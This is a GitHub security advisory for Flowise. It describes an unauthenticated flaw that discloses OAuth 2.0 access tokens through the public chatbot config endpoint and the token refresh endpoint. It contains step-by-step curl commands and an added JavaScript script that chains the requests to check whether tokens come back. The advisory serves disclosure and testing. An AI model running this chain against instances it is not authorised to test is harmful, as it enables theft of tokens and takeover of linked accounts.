GHSA-6F7G-V4PP-R667
Vulnerability from github – Published: 2026-04-16 21:52 – Updated: 2026-04-16 21:52
Summary
Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow.
By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication.
Details
Flowise is designed to allow public chatflows to be accessed by unauthenticated end users via public URLs or embedded widgets. As a result, chatflowId values are intentionally exposed to unauthenticated clients and must not be treated as secrets.
However, the endpoint GET /api/v1/public-chatbotConfig/<chatflowId> returns internal flowData without authentication. The returned flowData includes workflow node definitions containing OAuth credential identifiers (credential field).
Separately, the endpoint POST /api/v1/oauth2-credential/refresh/<credentialId> allows OAuth 2.0 tokens to be refreshed without any authentication or authorization check: the server neither requires a session nor verifies that the caller is entitled to the referenced credential.
Because credential identifiers can be obtained from the unauthenticated public chatflow configuration endpoint, these two behaviors can be combined to allow unauthenticated OAuth 2.0 access token disclosure.
PoC
Prerequisites
- Self-hosted Flowise instance
- A public chatflow configured with an OAuth 2.0 credential (e.g., Gmail OAuth2)
Step 1: Obtain chatflowId
The chatflowId is exposed to unauthenticated users via public chatflow URLs, embedded widgets, or browser network requests when accessing a public chatflow.
Example: d37b9812-72c1-4c64-b152-665f307f755e
Step 2: Retrieve internal flowData without authentication
curl -s \
http://localhost:3000/api/v1/public-chatbotConfig/d37b9812-72c1-4c64-b152-665f307f755e
The response includes flowData containing an OAuth credential identifier, for example:
"credential": "6efe0e20-ba6f-4fbb-9960-658feffa0542"
Step 3: Refresh OAuth 2.0 token without authentication
curl -X POST \
http://localhost:3000/api/v1/oauth2-credential/refresh/6efe0e20-ba6f-4fbb-9960-658feffa0542
The response returns valid OAuth 2.0 access token data, including an access_token.
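The three steps above, chained in one script, as an added example for checking your own instance; this is not Flowise code and not part of the advisory. It assumes the flowData layout is a JSON string with a "nodes" array whose entries carry a data.credential field (the advisory names only the credential field, so the surrounding node shape is an assumption), that the refresh endpoint answers 200 with an access_token on a vulnerable build and 401/403 on a fixed one, and Node 18+ for the global fetch. The embedded config response is constructed sample data.

```javascript
// Added example (not Flowise's own code): chain the two unauthenticated endpoints
// from the advisory and classify the result. The flowData node shape below is an
// assumption; only the "credential" field is named by the advisory.

const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;

// Constructed sample of a GET /api/v1/public-chatbotConfig/<chatflowId> response.
// Only the fields this script reads are included; a real response carries more.
const SAMPLE_CONFIG = {
  flowData: JSON.stringify({
    nodes: [
      { id: "gmail_0", data: { name: "gmail", credential: "6efe0e20-ba6f-4fbb-9960-658feffa0542" } },
      { id: "llm_0", data: { name: "chatOpenAI", credential: "" } },
      { id: "tool_0", data: { name: "calculator" } },
    ],
    edges: [],
  }),
};

// Step 2 -> Step 3 glue: collect every credential identifier in a public chatflow config.
// flowData may arrive as a JSON string or an already-parsed object; both are handled.
function extractCredentialIds(config) {
  const raw = config.flowData;
  const flow = typeof raw === "string" ? JSON.parse(raw) : raw;
  const nodes = Array.isArray(flow?.nodes) ? flow.nodes : [];
  const ids = new Set();
  for (const node of nodes) {
    const cred = node?.data?.credential;
    if (typeof cred === "string" && UUID_RE.test(cred)) ids.add(cred);
  }
  return [...ids];
}

// Step 3: one POST per credential id, exactly as the curl command in the advisory.
function buildRefreshRequests(baseUrl, credentialIds) {
  const base = baseUrl.replace(/\/+$/, "");
  return credentialIds.map((id) => ({
    method: "POST",
    url: `${base}/api/v1/oauth2-credential/refresh/${id}`,
  }));
}

// A patched server should reject the unauthenticated call; a vulnerable one returns
// token data including access_token. Anything else needs a human look.
function classifyRefresh(status, body) {
  if (status === 401 || status === 403) return "rejected";
  if (status === 200 && body && typeof body.access_token === "string") return "token-disclosed";
  return "inconclusive";
}

// Live run against an instance you are authorised to test:
//   node check.js http://localhost:3000 d37b9812-72c1-4c64-b152-665f307f755e
async function run(baseUrl, chatflowId) {
  const base = baseUrl.replace(/\/+$/, "");
  const cfgRes = await fetch(`${base}/api/v1/public-chatbotConfig/${chatflowId}`);
  if (!cfgRes.ok) throw new Error(`public-chatbotConfig returned ${cfgRes.status}`);
  const ids = extractCredentialIds(await cfgRes.json());
  for (const req of buildRefreshRequests(base, ids)) {
    const res = await fetch(req.url, { method: req.method });
    let body = null;
    try { body = await res.json(); } catch { /* non-JSON body, leave null */ }
    console.log(req.url, res.status, classifyRefresh(res.status, body));
  }
}

if (process.argv.length >= 4) {
  run(process.argv[2], process.argv[3]).catch((e) => { console.error(e); process.exit(1); });
}
```

Run without arguments the script only defines the helpers; with a base URL and chatflowId it performs the live check. The classification deliberately never prints the token itself; the status plus the presence of access_token is enough evidence, and leaking a live token into a log would recreate the problem being tested.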
Impact
An unauthenticated attacker can obtain OAuth 2.0 access tokens for third-party services configured in Flowise, potentially leading to unauthorized data access, API abuse, or account compromise of the linked accounts (for example the Gmail account behind a Gmail OAuth2 credential).
This vulnerability affects self-hosted deployments because public chatflows are commonly exposed to the internet and require unauthenticated access by design. Treating chatflowId as a secret does not mitigate the issue. Per the affected range recorded below, the npm package flowise is affected up to and including 3.0.13 and fixed in 3.1.0.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.13"
},
"package": {
"ecosystem": "npm",
"name": "flowise"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T21:52:46Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nFlowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow.\n\nBy accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication.\n\n### Details\nFlowise is designed to allow public chatflows to be accessed by unauthenticated end users via public URLs or embedded widgets. As a result, `chatflowId` values are intentionally exposed to unauthenticated clients and must not be treated as secrets.\n\nHowever, the endpoint `GET /api/v1/public-chatbotConfig/\u003cchatflowId\u003e` returns internal `flowData` without authentication. The returned `flowData` includes workflow node definitions containing OAuth credential identifiers (`credential` field).\n\nSeparately, the endpoint `POST /api/v1/oauth2-credential/refresh/\u003ccredentialId\u003e` allows OAuth 2.0 tokens to be refreshed without authentication or authorization checks.\n\nBecause credential identifiers can be obtained from the unauthenticated public chatflow configuration endpoint, these two behaviors can be combined to allow unauthenticated OAuth 2.0 access token disclosure.\n\n### PoC\n**Prerequisites**\n- Self-hosted Flowise instance\n- A public chatflow configured with an OAuth 2.0 credential (e.g., Gmail OAuth2)\n\n#### Step 1: Obtain `chatflowId`\nThe `chatflowId` is exposed to unauthenticated users via public chatflow URLs, embedded widgets, or browser network requests when accessing a public chatflow.\n\nExample: `d37b9812-72c1-4c64-b152-665f307f755e`\n\n#### Step 2: Retrieve internal `flowData` without authentication\n\n```bash\ncurl -s \\\n http://localhost:3000/api/v1/public-chatbotConfig/d37b9812-72c1-4c64-b152-665f307f755e\n```\n\nThe response includes flowData containing an OAuth credential identifier, for example:\n\n```\n\"credential\": \"6efe0e20-ba6f-4fbb-9960-658feffa0542\"\n```\n\n#### Step 3: Refresh OAuth 2.0 token without authentication\n\n```bash\ncurl -X POST \\\n http://localhost:3000/api/v1/oauth2-credential/refresh/6efe0e20-ba6f-4fbb-9960-658feffa0542\n```\n\nThe response returns valid OAuth 2.0 access token data, including an `access_token`.\n\n### Impact\nAn unauthenticated attacker can obtain OAuth 2.0 access tokens for third-party services configured in Flowise, potentially leading to unauthorized data access, API abuse, or account compromise.\n\nThis vulnerability affects self-hosted deployments because public chatflows are commonly exposed to the internet and require unauthenticated access by design. Treating `chatflowId` as a secret does not mitigate the issue.",
"id": "GHSA-6f7g-v4pp-r667",
"modified": "2026-04-16T21:52:46Z",
"published": "2026-04-16T21:52:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667"
},
{
"type": "PACKAGE",
"url": "https://github.com/FlowiseAI/Flowise"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Flowise: Unauthenticated OAuth 2.0 Access Token Disclosure via Public Chatflow in Flowise"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.